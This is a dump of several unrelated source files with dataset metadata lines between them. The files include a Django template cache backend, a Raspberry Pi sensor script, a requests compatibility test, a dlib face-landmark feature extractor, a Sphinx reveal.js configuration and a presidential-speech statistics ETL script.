self._cache_key(name) cache.delete(cache_key) class FileSystemBackend(BaseCacheBackend): """ A cache backend that uses simple files to hold the template cache. """ def __init__(self): try: self.cache_dir = getattr(settings, 'DBTEMPLATES_CACHE_DIR', None) self.cache_dir = os.path.normpath(self.cache_dir) if not os.path.isdir(self.cache_dir): pass except: raise ImproperlyConfigured('You\'re using the dbtemplates\' file system cache backend without having set the DBTEMPLATES_CACHE_DIR setting to a valid value. Make sure the directory exists and is writeable for the user your Django instance is running with.') super(FileSystemBackend, self).__init__() def _filepath(self, name): return os.path.join(self.cache_dir, name) def load(self, name): try: filepath = self._filepath(name) return open(filepath).read().decode('utf-8') except: return None def save(self, name, content, retry=False): try: filepath = self._filepath(name) dirname = os.path.dirname(filepath) if not os.path.exists(dirname): os.makedirs(dirname) cache_file = open(filepath, 'w') cache_file.write(force_unicode(content).encode('utf-8')) cache_file.close() except Exception: raise def remove(self, name): try: filepath = self._filepath(name) os.remove(filepath) except: pass
en
0.619798
Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. Loads a template from the cache with the given name. Saves the given template content with the given name in the cache. Removes the template with the given name from the cache. A cache backend that uses Django's cache mechanism. A cache backend that uses simple files to hold the template cache.
2.17045
2
examples/raspi/output_sensor_data.py
WeHaus/WeHaus_NodeJS_Client
0
6623606
#!/usr/bin/python import sys import Adafruit_DHT humidity, temperature = Adafruit_DHT.read_retry(11, 4) print('{0:0.1f},{1:0.1f}'.format(temperature, humidity))
#!/usr/bin/python import sys import Adafruit_DHT humidity, temperature = Adafruit_DHT.read_retry(11, 4) print('{0:0.1f},{1:0.1f}'.format(temperature, humidity))
ru
0.258958
#!/usr/bin/python
2.642467
3
tests/requests_compat/test_api.py
mwoss/httpx
1
6623607
<reponame>mwoss/httpx """Test compatibility with the Requests high-level API.""" import pytest import requests @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L61-L70" ) def test_entrypoints(): requests.session requests.session().get requests.session().head requests.get requests.head requests.put requests.patch requests.post @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L72", changes=["added noqa comment to silence flake8"], ) @pytest.mark.xfail( reason="PoolManager has no obvious equivalent in HTTPX", raises=ImportError ) def test_poolmanager_entrypoint(): # Not really an entry point, but people rely on it. from requests.packages.urllib3.poolmanager import PoolManager # noqa: F401
"""Test compatibility with the Requests high-level API.""" import pytest import requests @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L61-L70" ) def test_entrypoints(): requests.session requests.session().get requests.session().head requests.get requests.head requests.put requests.patch requests.post @pytest.mark.copied_from( "https://github.com/psf/requests/blob/v2.22.0/tests/test_requests.py#L72", changes=["added noqa comment to silence flake8"], ) @pytest.mark.xfail( reason="PoolManager has no obvious equivalent in HTTPX", raises=ImportError ) def test_poolmanager_entrypoint(): # Not really an entry point, but people rely on it. from requests.packages.urllib3.poolmanager import PoolManager # noqa: F401
en
0.949581
Test compatibility with the Requests high-level API. #L61-L70" #L72", # Not really an entry point, but people rely on it. # noqa: F401
2.329088
2
AMLS_19-20_ZHIDIAN_XIE_SN16077117/face_landmarks.py
RawTimmy/AMLSassignment19_20
1
6623608
import os import numpy as np from keras.preprocessing import image import cv2 import dlib # PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size global basedir_celeba, basedir_celeba_test, image_paths_celeba, image_paths_celeba_test, target_size basedir_celeba = './Datasets/celeba' basedir_celeba_test = './Datasets/dataset_test_AMLS_19-20/celeba_test' images_dir_celeba = os.path.join(basedir_celeba,'img') images_dir_celeba_test = os.path.join(basedir_celeba_test,'img') # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') labels_filename = 'labels.csv' detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. def shape_to_np(shape, dtype="int"): # initialize the list of (x, y)-coordinates coords = np.zeros((shape.num_parts, 2), dtype=dtype) # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates for i in range(0, shape.num_parts): coords[i] = (shape.part(i).x, shape.part(i).y) # return the list of (x, y)-coordinates return coords def rect_to_bb(rect): # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV x = rect.left() y = rect.top() w = rect.right() - x h = rect.bottom() - y # return a tuple of (x, y, w, h) return (x, y, w, h) def run_dlib_shape(image): # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale resized_image = image.astype('uint8') gray = cv2.cvtColor(resized_image, cv2.COLOR_BGR2GRAY) gray = gray.astype('uint8') # detect faces in the grayscale image rects = detector(gray, 1) num_faces = len(rects) if num_faces == 0: return None, resized_image face_areas = np.zeros((1, num_faces)) face_shapes = np.zeros((136, num_faces), dtype=np.int64) # loop over the face detections for (i, rect) in enumerate(rects): # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array temp_shape = predictor(gray, rect) temp_shape = shape_to_np(temp_shape) # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) (x, y, w, h) = rect_to_bb(rect) face_shapes[:, i] = np.reshape(temp_shape, [136]) face_areas[0, i] = w * h # find largest face and keep dlibout = np.reshape(np.transpose(face_shapes[:, np.argmax(face_areas)]), [68, 2]) return dlibout, resized_image def extract_features_labels(test): """ This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected """ select_dir_celeba, select_basedir_celeba = None, None if test is False: select_dir_celeba, select_basedir_celeba = images_dir_celeba, basedir_celeba else: select_dir_celeba, select_basedir_celeba = images_dir_celeba_test, basedir_celeba_test image_paths_celeba = [os.path.join(select_dir_celeba, l) for l in os.listdir(select_dir_celeba)] target_size = None labels_file = open(os.path.join(select_basedir_celeba, labels_filename), 'r') lines = labels_file.readlines() gender_emo_labels = {line.split('\t')[1] : np.array([int(line.split('\t')[2]), int(line.split('\t')[3])]) for line in lines[1:]} if os.path.isdir(select_dir_celeba): all_features = [] all_labels = [] for img_path in image_paths_celeba: file_name= img_path.split('.')[1].split('/')[-1] # load image img = image.img_to_array( image.load_img(img_path, target_size=target_size, interpolation='bicubic')) features, _ = run_dlib_shape(img) if features is not None: all_features.append(features) all_labels.append(gender_emo_labels[file_name+'.jpg']) output_features = np.array(all_features) output_labels = (np.array(all_labels) + 1) / 2 return output_features, output_labels # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = [] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
import os import numpy as np from keras.preprocessing import image import cv2 import dlib # PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size global basedir_celeba, basedir_celeba_test, image_paths_celeba, image_paths_celeba_test, target_size basedir_celeba = './Datasets/celeba' basedir_celeba_test = './Datasets/dataset_test_AMLS_19-20/celeba_test' images_dir_celeba = os.path.join(basedir_celeba,'img') images_dir_celeba_test = os.path.join(basedir_celeba_test,'img') # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') labels_filename = 'labels.csv' detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. def shape_to_np(shape, dtype="int"): # initialize the list of (x, y)-coordinates coords = np.zeros((shape.num_parts, 2), dtype=dtype) # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates for i in range(0, shape.num_parts): coords[i] = (shape.part(i).x, shape.part(i).y) # return the list of (x, y)-coordinates return coords def rect_to_bb(rect): # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV x = rect.left() y = rect.top() w = rect.right() - x h = rect.bottom() - y # return a tuple of (x, y, w, h) return (x, y, w, h) def run_dlib_shape(image): # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale resized_image = image.astype('uint8') gray = cv2.cvtColor(resized_image, cv2.COLOR_BGR2GRAY) gray = gray.astype('uint8') # detect faces in the grayscale image rects = detector(gray, 1) num_faces = len(rects) if num_faces == 0: return None, resized_image face_areas = np.zeros((1, num_faces)) face_shapes = np.zeros((136, num_faces), dtype=np.int64) # loop over the face detections for (i, rect) in enumerate(rects): # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array temp_shape = predictor(gray, rect) temp_shape = shape_to_np(temp_shape) # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) (x, y, w, h) = rect_to_bb(rect) face_shapes[:, i] = np.reshape(temp_shape, [136]) face_areas[0, i] = w * h # find largest face and keep dlibout = np.reshape(np.transpose(face_shapes[:, np.argmax(face_areas)]), [68, 2]) return dlibout, resized_image def extract_features_labels(test): """ This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected """ select_dir_celeba, select_basedir_celeba = None, None if test is False: select_dir_celeba, select_basedir_celeba = images_dir_celeba, basedir_celeba else: select_dir_celeba, select_basedir_celeba = images_dir_celeba_test, basedir_celeba_test image_paths_celeba = [os.path.join(select_dir_celeba, l) for l in os.listdir(select_dir_celeba)] target_size = None labels_file = open(os.path.join(select_basedir_celeba, labels_filename), 'r') lines = labels_file.readlines() gender_emo_labels = {line.split('\t')[1] : np.array([int(line.split('\t')[2]), int(line.split('\t')[3])]) for line in lines[1:]} if os.path.isdir(select_dir_celeba): all_features = [] all_labels = [] for img_path in image_paths_celeba: file_name= img_path.split('.')[1].split('/')[-1] # load image img = image.img_to_array( image.load_img(img_path, target_size=target_size, interpolation='bicubic')) features, _ = run_dlib_shape(img) if features is not None: all_features.append(features) all_labels.append(gender_emo_labels[file_name+'.jpg']) output_features = np.array(all_features) output_labels = (np.array(all_labels) + 1) / 2 return output_features, output_labels # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = [] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
en
0.726333
# PATH TO ALL IMAGES # global basedir_celeba, basedir_cartoon, image_paths_celeba, image_paths_cartoon, target_size # basedir_cartoon = './Datasets/cartoon_set' # images_dir_cartoon = os.path.join(basedir_cartoon,'img') # how to find frontal human faces in an image using 68 landmarks. These are points on the face such as the corners of the mouth, along the eyebrows, on the eyes, and so forth. # The face detector we use is made using the classic Histogram of Oriented # Gradients (HOG) feature combined with a linear classifier, an image pyramid, # and sliding window detection scheme. The pose estimator was created by # using dlib's implementation of the paper: # One Millisecond Face Alignment with an Ensemble of Regression Trees by # <NAME> and <NAME>, CVPR 2014 # and was trained on the iBUG 300-W face landmark dataset (see https://ibug.doc.ic.ac.uk/resources/facial-point-annotations/): # <NAME>, <NAME>, <NAME>, <NAME>, <NAME>. # 300 faces In-the-wild challenge: Database and results. # Image and Vision Computing (IMAVIS), Special Issue on Facial Landmark Localisation "In-The-Wild". 2016. # initialize the list of (x, y)-coordinates # loop over all facial landmarks and convert them # to a 2-tuple of (x, y)-coordinates # return the list of (x, y)-coordinates # take a bounding predicted by dlib and convert it # to the format (x, y, w, h) as we would normally do # with OpenCV # return a tuple of (x, y, w, h) # in this function we load the image, detect the landmarks of the face, and then return the image and the landmarks # load the input image, resize it, and convert it to grayscale # detect faces in the grayscale image # loop over the face detections # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array # convert dlib's rectangle to a OpenCV-style bounding box # [i.e., (x, y, w, h)], # (x, y, w, h) = face_utils.rect_to_bb(rect) # find largest face and keep This funtion extracts the landmarks features for all images in the folder 'Datasets/celeba/img'. It also extracts the gender label for each image. :return: landmark_features: an array containing 68 landmark points for each image in which a face was detected gender_labels: an array containing the gender label (male=0 and female=1) for each image in which a face was detected # load image # def extract_features_labels_cartoon(): # image_paths_cartoon = [os.path.join(images_dir_cartoon, l) for l in os.listdir(images_dir_cartoon)] # target_size = None # labels_file = open(os.path.join(basedir_cartoon, labels_filename), 'r') # lines = labels_file.readlines() # face_shape_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # eye_color_labels = {line.split('\t')[-1].split('\n')[0] : int(line.split('\t')[2]) for line in lines[1:]} # # if os.path.isdir(images_dir_cartoon): # all_features = [] # all_labels_face_shape = [] # all_labels_eye_color = [] # for img_path in image_paths_cartoon: # file_name = img_path.split('.')[1].split('/')[-1] # # img = image.img_to_array(image.load_img(img_path, # target_size=(128,128), # interpolation='bicubic')) # features, _ = run_dlib_shape(img) # if features is not None: # all_features.append(features) # all_labels_face_shape.append(face_shape_labels[file_name+'.png']) # all_labels_eye_color.append(eye_color_labels[file_name+'.png']) # # landmark_features = np.array(all_features) # face_shape_labels = np.array(all_labels_face_shape) # eye_color_labels = np.array(all_labels_eye_color) # return landmark_features, face_shape_labels, eye_color_labels
2.953247
3
src/python/WMQuality/Emulators/PyCondorAPI/MockPyCondorAPI.py
khurtado/WMCore
21
6623609
from __future__ import (division, print_function) from builtins import object class MockPyCondorAPI(object): """ Version of Services/PyCondor intended to be used with mock or unittest.mock """ def __init__(self, *args, **kwargs): print("Using MockPyCondorAPI") def getCondorJobsSummary(self): """ Mock a condor query for the job summary """ return [] def getCondorJobs(self, constraint='true', attrList=None, limit=-1, opts="SummaryOnly"): """ Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. """ return None def isScheddOverloaded(self): """check whether job limit is reached in local schedd""" return False
from __future__ import (division, print_function) from builtins import object class MockPyCondorAPI(object): """ Version of Services/PyCondor intended to be used with mock or unittest.mock """ def __init__(self, *args, **kwargs): print("Using MockPyCondorAPI") def getCondorJobsSummary(self): """ Mock a condor query for the job summary """ return [] def getCondorJobs(self, constraint='true', attrList=None, limit=-1, opts="SummaryOnly"): """ Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. """ return None def isScheddOverloaded(self): """check whether job limit is reached in local schedd""" return False
en
0.78907
Version of Services/PyCondor intended to be used with mock or unittest.mock Mock a condor query for the job summary Given a job/schedd constraint, return a list of jobs attributes or None if the query to condor fails. check whether job limit is reached in local schedd
2.945413
3
docs/conf.py
titilambert/sphinxjp.themes.revealjs
1
6623610
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- source_suffix = '.rst' master_doc = 'index' project = u'sphinx theme for reveal.js' copyright = u'2013, tell-k' version = '0.1.1' # -- Options for HTML output --------------------------------------------------- extensions = ['sphinxjp.themes.revealjs'] html_theme = 'revealjs' html_use_index = False # -- HTML theme options for `revealjs` style ------------------------------------- html_theme_options = { # Set the lang attribute of the html tag. Defaults to "ja" "lang": "ja", # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions "width": 960, "height": 700, # Factor of the display size that should remain empty around the content "margin": 0.1, # Bounds for smallest/largest possible scale to apply to content "min_scale": 0.2, "max_scale": 1.0, # Display controls in the bottom right corner "controls": True, # Display a presentation progress bar "progress": True, # Push each slide change to the browser history "history": True, # Enable keyboard shortcuts for navigation "keyboard": True, # Enable the slide overview mode "overview": True, # Vertical centring of slides "center": True, # Enables touch navigation on devices with touch input "touch": True, # Loop the presentation "loop": False, # Change the presentation direction to be RTL "rtl": False, # Turns fragments on and off globally "fragments": True, # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides "auto_slide": 0, # Enable slide navigation via mouse wheel "mouse_wheel": False, # Apply a 3D roll to links on hover "rolling_links": True, # Opens links in an iframe preview overlay "preview_links": False, # Theme (default/beige/moon/night/serif/simple/sky/solarized) "theme": "default", # Transition style (default/cube/page/concave/zoom/linear/fade/none) "transition": "default", # Transition speed (default/fast/slow) "transition_speed": "default", # Transition style for full page slide backgrounds (default/linear) "background_transition": "default", # Enable plguin javascript for reveal.js "plugin_list": ["search/search.js", "remotes/remotes.js"], }
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- source_suffix = '.rst' master_doc = 'index' project = u'sphinx theme for reveal.js' copyright = u'2013, tell-k' version = '0.1.1' # -- Options for HTML output --------------------------------------------------- extensions = ['sphinxjp.themes.revealjs'] html_theme = 'revealjs' html_use_index = False # -- HTML theme options for `revealjs` style ------------------------------------- html_theme_options = { # Set the lang attribute of the html tag. Defaults to "ja" "lang": "ja", # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions "width": 960, "height": 700, # Factor of the display size that should remain empty around the content "margin": 0.1, # Bounds for smallest/largest possible scale to apply to content "min_scale": 0.2, "max_scale": 1.0, # Display controls in the bottom right corner "controls": True, # Display a presentation progress bar "progress": True, # Push each slide change to the browser history "history": True, # Enable keyboard shortcuts for navigation "keyboard": True, # Enable the slide overview mode "overview": True, # Vertical centring of slides "center": True, # Enables touch navigation on devices with touch input "touch": True, # Loop the presentation "loop": False, # Change the presentation direction to be RTL "rtl": False, # Turns fragments on and off globally "fragments": True, # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides "auto_slide": 0, # Enable slide navigation via mouse wheel "mouse_wheel": False, # Apply a 3D roll to links on hover "rolling_links": True, # Opens links in an iframe preview overlay "preview_links": False, # Theme (default/beige/moon/night/serif/simple/sky/solarized) "theme": "default", # Transition style (default/cube/page/concave/zoom/linear/fade/none) "transition": "default", # Transition speed (default/fast/slow) "transition_speed": "default", # Transition style for full page slide backgrounds (default/linear) "background_transition": "default", # Enable plguin javascript for reveal.js "plugin_list": ["search/search.js", "remotes/remotes.js"], }
en
0.599509
# -*- coding: utf-8 -*- # # -- General configuration ----------------------------------------------------- # -- Options for HTML output --------------------------------------------------- # -- HTML theme options for `revealjs` style ------------------------------------- # Set the lang attribute of the html tag. Defaults to "ja" # The "normal" size of the presentation, aspect ratio will be preserved # when the presentation is scaled to fit different resolutions # Factor of the display size that should remain empty around the content # Bounds for smallest/largest possible scale to apply to content # Display controls in the bottom right corner # Display a presentation progress bar # Push each slide change to the browser history # Enable keyboard shortcuts for navigation # Enable the slide overview mode # Vertical centring of slides # Enables touch navigation on devices with touch input # Loop the presentation # Change the presentation direction to be RTL # Turns fragments on and off globally # Number of milliseconds between automatically proceeding to the # next slide, disabled when set to 0, this value can be overwritten # by using a data-autoslide attribute on your slides # Enable slide navigation via mouse wheel # Apply a 3D roll to links on hover # Opens links in an iframe preview overlay # Theme (default/beige/moon/night/serif/simple/sky/solarized) # Transition style (default/cube/page/concave/zoom/linear/fade/none) # Transition speed (default/fast/slow) # Transition style for full page slide backgrounds (default/linear) # Enable plguin javascript for reveal.js
1.232244
1
src/etl/speech_stats.py
dmegbert/prez-speech
0
6623611
from concurrent.futures import ThreadPoolExecutor, as_completed from statistics import median from psycopg2.extras import execute_values import textstat from sklearn.feature_extraction.text import CountVectorizer from textblob import TextBlob from src.db_utils import safe_cursor def get_speech_stats(speech_id): with safe_cursor() as cur: cur.execute('SELECT id, president_id, transcript FROM speeches WHERE id = %s', (speech_id,)) raw_speech = cur.fetchone() speech = {'speech_id': raw_speech.id, 'president_id': raw_speech.president_id, 'speech': raw_speech.transcript} raw_text = speech['speech'] sp_blob = TextBlob(raw_text) speech['polarity'], speech['subjectivity'] = sp_blob.sentiment speech['word_count'] = len(sp_blob.words) speech['sentence_count'] = len(sp_blob.sentences) speech['median_sentence_length'] = median([len(sentence) for sentence in sp_blob.sentences]) common_words = get_top_n_words([raw_text], 50, (1, 1)) unigrams_dict = _format_unigrams(common_words, speech['president_id'], speech['speech_id']) speech['grade_reading_level'] = textstat.coleman_liau_index(raw_text) return speech, unigrams_dict def _format_unigrams(common_words, president_id, speech_id): speech_constants = {'president_id': president_id, 'speech_id': speech_id} return [{'unigram': word, 'count': ct, **speech_constants} for word, ct in common_words] def get_speeches(): with ThreadPoolExecutor(max_workers=10) as executor: futures = [executor.submit(get_speech_stats, speech_id) for speech_id in range(1, 1022)] for future in as_completed(futures): try: load_speech_stats(future.result()) except Exception as exc: print(exc) def load_speech_stats(stats_and_unigrams): stats, unigrams = stats_and_unigrams with safe_cursor() as cur_2: execute_values( cur_2, 'INSERT INTO unigrams' '(president_id, speech_id, unigram, occurrence)' 'VALUES %s', unigrams, '(%(president_id)s, %(speech_id)s, %(unigram)s, %(count)s)' ) with safe_cursor() as cur: cur.execute( 'INSERT INTO speech_stats' '(speech_id, polarity, subjectivity, word_count,' 'sentence_count, president_id, grade_reading_level) ' 'VALUES (%(speech_id)s, %(polarity)s, %(subjectivity)s,' '%(word_count)s, %(sentence_count)s, %(president_id)s, %(grade_reading_level)s)', stats ) def get_top_n_words(corpus, n=20, ngram_range=(1, 1)): vec = CountVectorizer(strip_accents='unicode', stop_words='english', ngram_range=ngram_range).fit(corpus) bag_of_words = vec.transform(corpus) sum_words = bag_of_words.sum(axis=0) words_freq = [(word, int(sum_words[0, idx])) for word, idx in vec.vocabulary_.items()] words_freq = sorted(words_freq, key=lambda x: x[1], reverse=True) return words_freq[:n]
from concurrent.futures import ThreadPoolExecutor, as_completed from statistics import median from psycopg2.extras import execute_values import textstat from sklearn.feature_extraction.text import CountVectorizer from textblob import TextBlob from src.db_utils import safe_cursor def get_speech_stats(speech_id): with safe_cursor() as cur: cur.execute('SELECT id, president_id, transcript FROM speeches WHERE id = %s', (speech_id,)) raw_speech = cur.fetchone() speech = {'speech_id': raw_speech.id, 'president_id': raw_speech.president_id, 'speech': raw_speech.transcript} raw_text = speech['speech'] sp_blob = TextBlob(raw_text) speech['polarity'], speech['subjectivity'] = sp_blob.sentiment speech['word_count'] = len(sp_blob.words) speech['sentence_count'] = len(sp_blob.sentences) speech['median_sentence_length'] = median([len(sentence) for sentence in sp_blob.sentences]) common_words = get_top_n_words([raw_text], 50, (1, 1)) unigrams_dict = _format_unigrams(common_words, speech['president_id'], speech['speech_id']) speech['grade_reading_level'] = textstat.coleman_liau_index(raw_text) return speech, unigrams_dict def _format_unigrams(common_words, president_id, speech_id): speech_constants = {'president_id': president_id, 'speech_id': speech_id} return [{'unigram': word, 'count': ct, **speech_constants} for word, ct in common_words] def get_speeches(): with ThreadPoolExecutor(max_workers=10) as executor: futures = [executor.submit(get_speech_stats, speech_id) for speech_id in range(1, 1022)] for future in as_completed(futures): try: load_speech_stats(future.result()) except Exception as exc: print(exc) def load_speech_stats(stats_and_unigrams): stats, unigrams = stats_and_unigrams with safe_cursor() as cur_2: execute_values( cur_2, 'INSERT INTO unigrams' '(president_id, speech_id, unigram, occurrence)' 'VALUES %s', unigrams, '(%(president_id)s, %(speech_id)s, %(unigram)s, %(count)s)' ) with safe_cursor() as cur: cur.execute( 'INSERT INTO speech_stats' '(speech_id, polarity, subjectivity, word_count,' 'sentence_count, president_id, grade_reading_level) ' 'VALUES (%(speech_id)s, %(polarity)s, %(subjectivity)s,' '%(word_count)s, %(sentence_count)s, %(president_id)s, %(grade_reading_level)s)', stats ) def get_top_n_words(corpus, n=20, ngram_range=(1, 1)): vec = CountVectorizer(strip_accents='unicode', stop_words='english', ngram_range=ngram_range).fit(corpus) bag_of_words = vec.transform(corpus) sum_words = bag_of_words.sum(axis=0) words_freq = [(word, int(sum_words[0, idx])) for word, idx in vec.vocabulary_.items()] words_freq = sorted(words_freq, key=lambda x: x[1], reverse=True) return words_freq[:n]
none
1
2.70919
3
operations/operation.py
zylamarek/dataset-tools
0
6623612
from dataset import Dataset class Operation: def __init__(self, path_in, prepend_name='', is_sequence=False, keep_filenames=False, cache_out=False): self.prepend_name = prepend_name if path_in[-1] == '/' or path_in[-1] == '\\': path_in = path_in[:-1] self.path_in = path_in self.data_in = Dataset(path_in) self.path_out = self.path_in + '_' + self.name() self.data_out = Dataset(self.path_out, cache=cache_out) self.is_sequence = is_sequence self.keep_filenames = keep_filenames self.cache_out = cache_out def name(self): return self.prepend_name + self.__class__.__name__ def apply(self): raise NotImplementedError
from dataset import Dataset class Operation: def __init__(self, path_in, prepend_name='', is_sequence=False, keep_filenames=False, cache_out=False): self.prepend_name = prepend_name if path_in[-1] == '/' or path_in[-1] == '\\': path_in = path_in[:-1] self.path_in = path_in self.data_in = Dataset(path_in) self.path_out = self.path_in + '_' + self.name() self.data_out = Dataset(self.path_out, cache=cache_out) self.is_sequence = is_sequence self.keep_filenames = keep_filenames self.cache_out = cache_out def name(self): return self.prepend_name + self.__class__.__name__ def apply(self): raise NotImplementedError
none
1
2.890172
3
house/admin.py
SnailJin/house
0
6623613
<reponame>SnailJin/house # -*- coding: utf-8 -*- ''' Created on 2015年4月20日 @author: jin ''' from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.models import User from house.models import UserProfile class UserProfileAdmin(admin.ModelAdmin): pass admin.site.register(UserProfile, UserProfileAdmin)
# -*- coding: utf-8 -*- ''' Created on 2015年4月20日 @author: jin ''' from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.models import User from house.models import UserProfile class UserProfileAdmin(admin.ModelAdmin): pass admin.site.register(UserProfile, UserProfileAdmin)
zh
0.643388
# -*- coding: utf-8 -*- Created on 2015年4月20日 @author: jin
1.60344
2
src/pairwise.py
sawyerWeld/PrefGAN
0
6623614
